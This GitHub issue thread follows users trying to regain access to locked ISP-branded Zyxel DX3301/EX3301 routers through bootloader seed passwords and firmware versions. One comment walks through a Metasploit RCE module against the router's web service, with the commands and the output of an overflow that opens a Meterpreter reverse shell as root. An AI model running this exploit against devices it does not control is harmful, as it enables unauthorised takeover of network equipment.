### ISSUE TITLE
http://172.21.83.77/aten.php not available

### ISSUE THREAD

**Issue by drsn00ker** [chear/SWNote#1]
Howdy!
Is there an alternative link or generator for the zyxel password?
The link is no longer functional....

**Comment by ghost** [comment]
@drsn00ker did you find a way to generate the password?
Thank you.

**Comment by kr105** [comment]
Try here: https://www.apoapsis.cl/otros/zyxel-uboot-password-generator.htm

**Comment by ghost** [comment]
Unfortunately, it's not working.
The link only provides an 8-digit code,
but I need a 30-digit code.
Thank you.

**Comment by drsn00ker** [comment]
@bougrinabil I found that if you don't request seed with ATSE, the password is fixed depending on the MAC. 
https://github.com/TopCaver/scz_doc_copy/blob/master/misc/201501281359.txt.md

Good luck with your large code, will probably need reverse engineering the boot sector...

**Comment by Ahabouayoub** [comment]
I have a Zyxel EX3301-T0 router. I want to unlock u-boot to unbrick the router. I found that it provides a seed with the command: "**atse DX3301-T0**"  
**2400C00C09503316E000148493987B03118E**
and expects a password generated from that seed:

and we use the command aten to unlock debugging mode and reveal **root, supervisor, and wifi password**:  "**aten 1,363943360710703246723488897955**"

<img width="424" height="140" alt="Image" src="https://github.com/user-attachments/assets/9d02259e-b96d-4e63-b303-eb3b090c8901" />


If someone knows where to find such a tool or purchase it or something let me know. I would deeply appreciate it. My router is like a switch right now because I cannot log in. The admin, root and supervisor credentials are not present at the back. and already confirmed that a file inside the /tmp directory is changing all the account credentials. I'll provide a snippet of the log via uart to the router:

```
Initial 4: beatmlink....
Initial 5: beptmlink....
Initial 6: besysinfo....
Initial 7: beaccount....
Changing password for root
Password for root changed by zytmproot
Changing password for supervisor
Password for supervisor changed by zytmproot
Changing password for admin
Bad password: too weak
Password for admin changed by zytmproot
zyGetAccountUidInfoFromFile: cannot find uid 'x:0:0' in '/etc/passwd'!file size of source = 182
```


The culprit is **zytmproot** because each time the router boots or if you flash the firmware using atur, zytmproot changes the the weak passwords to something generated by the serial number and the product number and the mac address of the router which is impossible to guess. I like this router but it's a tough nut to crack without that **seed calculator** . 
Zyxel and the isp companies wash their hands off this. They just don't care about e-waste at all. It falls back on us to reverse engineer and research and do all what we can to unlock it. I'm happy that someone already created the calculator but as it seems I'm late to the party because the website is not functional or offline since 2023.
Again if someone has any information about this let me know. 

Best regards.

**Comment by drsn00ker** [comment]
Perhaps try to track down the author of the original aten keygen?

**Comment by Ahabouayoub** [comment]
@drsn00ker I would've contacted the author of the program, but he's anonymous. I can't find any information about him, and the program was self-hosted on some server of the auther's program. it would've been great if someone could create an sh script or python script even that can be run offline. self-hosted websites do not survive that long and when you need it for some reason it's offline never to be found. I'm happy that someone got the opportunity to create such a tool and at the same time sad that I'm late to the party. It gives me hope though.

**Comment by drsn00ker** [comment]
Yeah that means it's possible to reverse engineer that algorithm as someone has done it before. I've looked at some ZynOS RasCodes and they are a pain to reverse.
The first step would be to dump its memory. Don't know what options you have available in locked mode. Sometimes ATDU is allowed. But you might have to physically dump the chip with a programmer...

**Comment by Ahabouayoub** [comment]
Yes, you are correct. The only way around getting access to the rootfs data if you're not unlocking u-boot, is to remove the chip from the board and dump and modify the firmware there. I posted an article there at openwrt but the arrogant mfrs removed my post. This world is so messed up. They refuse to help as well.

I tried the atdu command but it appears that it's locked too. 


```
Hit any key to stop autoboot:  1
ZHAL> help
ATEN    x[,y]         set BootExtension Debug Flag (y=password)
ATSE    x             show the seed of password generator
ATDC                  disable check model mechanism
ATSH                  dump manufacturer related data in ROM
ATRT    [x,y,z,u]     RAM read/write test (x=level, y=start addr, z=end addr, u=iterations)
ATGO                  boot up whole system
ATSR    [x]           system reboot
ATUR    x[,y]         upgrade RAS image (filename, partition number)
ZHAL> help atdu
ATEN    x[,y]         set BootExtension Debug Flag (y=password)
ATSE    x             show the seed of password generator
ATDC                  disable check model mechanism
ATSH                  dump manufacturer related data in ROM
ATRT    [x,y,z,u]     RAM read/write test (x=level, y=start addr, z=end addr, u=iterations)
ATGO                  boot up whole system
ATSR    [x]           system reboot
ATUR    x[,y]         upgrade RAS image (filename, partition number)
ZHAL> ATDU ?
ATEN    x[,y]         set BootExtension Debug Flag (y=password)
ATSE    x             show the seed of password generator
ATDC                  disable check model mechanism
ATSH                  dump manufacturer related data in ROM
ATRT    [x,y,z,u]     RAM read/write test (x=level, y=start addr, z=end addr, u=iterations)
ATGO                  boot up whole system
ATSR    [x]           system reboot
ATUR    x[,y]         upgrade RAS image (filename, partition number)
ZHAL>
```

**Comment by drsn00ker** [comment]
I guess a possible alternative is to contact user @Friday on the zyxel community forum
https://community.zyxel.com/en/discussion/comment/76941/#Comment_76941
They are able to provide the correct root/supervisor/admin passwords for newer Zyxel routers. I'd put money on that they can also provide the ATEN password based on the seed. But they only check in every few weeks, so you might have to be patient.

**Comment by Ahabouayoub** [comment]
Thanks for the info buddy. I also contacted Zyxel directly and this is what they have to say:

> Dear Mr. ********
>  
> Unfortunately, as mentioned earlier, I’m unable to assist you with the product associated with this serial number.
>  
> This device was specifically manufactured for an Internet Service Provider (ISP), and therefore I do not have access to its software or any related tools.
>  
> In this case, the most appropriate action would be to return the product to the place of purchase.
>  
> Best Regards.

**Comment by Ahabouayoub** [comment]
@drsn00ker I found a way but we would need a specific firmware version to accomplish this: This specific version

`V5.50(ABVY.3)C0` for either DX3301-T0 or EX3301-T0 if you found it share it with me here. Specifically ABVY.3 not ABVY.3.1... Okay?

**Comment by drsn00ker** [comment]
I have the 3.1 (DX3301 and EX3301 are the same) I don't have 3.0, (I also have 3.4 and 4 if that's useful)
https://limewire.com/d/h4iyV#uJpg10HAfe

**Comment by Ahabouayoub** [comment]
Is this firmware modified? V550ABVY3.1C0.bin I was trying to modify the inittab on the one I have but I lack the signing tools for the router to accept the firmware. It always says the checksum is wrong. 🤦‍♂️ Well, I'm no pro just a noob what can I expect. 

Yeah and for my plan to work I need this specific firmware buddy: V5.50(ABVY.3)C0. It would work for you like a charm also.

I'll explain why I need that specific version: because it contains a vulnerability. When you exploit that vulnerability, it drops you straight to the root shell uid 0 buddy... now isn't that something. You could add users and do whatever you want inside and then you'd have a working router again.  

What you need: 

1. **DX3301-T0 | V5.50(ABVY.3)C0**
2. **metasploit**
3.  **exploit this vulnerability right here :** `use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce`

```
Module options (exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host
   

Payload options (linux/armle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
```

```
msf > use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce
[*] Using configured payload linux/armle/meterpreter/reverse_tcp
msf exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set LHOST XXX.XXX.XXX.XXX
LHOST => XXX.XXX.XXX.XXX
msf exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set RHOSTS XXX.XXX.XXX.XXX
RHOSTS => XXX.XXX.XXX.XXX
msf exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > check
[+] XXX.XXX.XXX.XXX:80 - The target is vulnerable.
msf exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > set SRVHOST XXX.XXX.XXX.XXX
SRVHOST => XXX.XXX.XXX.XXX
msf exploit(linux/misc/zyxel_multiple_devices_zhttp_lan_rce) > run

[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
[*] Attempting to exploit VMG3312-T20A <= EOL
[*] Starting up our web service on XXX.XXX.XXX.XXX:8080 ...
[*] Using URL: http://XXX.XXX.XXX.XXX:8080/o
[*] Going to bruteforce ASLR, this will take a while...
[*] Trying to overflow the buffer, attempt 1
[*] Trying to overflow the buffer, attempt 2
[*] Trying to overflow the buffer, attempt 3
[*] Trying to overflow the buffer, attempt 4
[*] Trying to overflow the buffer, attempt 5
[*] Trying to overflow the buffer, attempt 6
[*] Trying to overflow the buffer, attempt 7
[*] Trying to overflow the buffer, attempt 8
[*] Trying to overflow the buffer, attempt 9
[*] Trying to overflow the buffer, attempt 10
[...]
[*] Trying to overflow the buffer, attempt 135
[*] Trying to overflow the buffer, attempt 136
[*] Trying to overflow the buffer, attempt 137
[*] Trying to overflow the buffer, attempt 138
[*] Trying to overflow the buffer, attempt 139
[+] XXX.XXX.XXX.XXX:80 - Sending executable to the router
[+] XXX.XXX.XXX.XXX:80 - A shell should connect soon!
[*] Sending stage (908480 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:55253) at 2022-07-24 19:03:41 +0200
[*] Server stopped.

meterpreter > shell
Process 9871 created.
Channel 1 created.
id
uid=0(root) gid=0
```

And boom 🔥 we've got ourselves a root shell just like that huh. That's why I said the exploit only works on that version of the firmware but it's nowhere to be found just like this seed calculator lmfao 😂

PS:   I ran this exact attack on firmware V550ABVY3.1.bin but it's not vulnerable to this type of attack. I guess they patched it in that update.

**Comment by drsn00ker** [comment]
It's not modified, but it might be for a different ISP, like Wind3 or something instead....

**Comment by Ahabouayoub** [comment]
I don't think so ISP specific firmware has different letters instead of C0 at the end. For example: the original firmware that was on my router is `V5.50(ABVY.3.9)G0_DIGI` If only I found this firmware so I can flash it back to the router so I can have user user account password.... Nothing seems to work man. I'm starting to think if this is even worth it. That digimobil is so evil man they don't provide admin account and its credentials at the back 🤦🏽‍♂️ if you somehow found that specific firmware let me know okay....
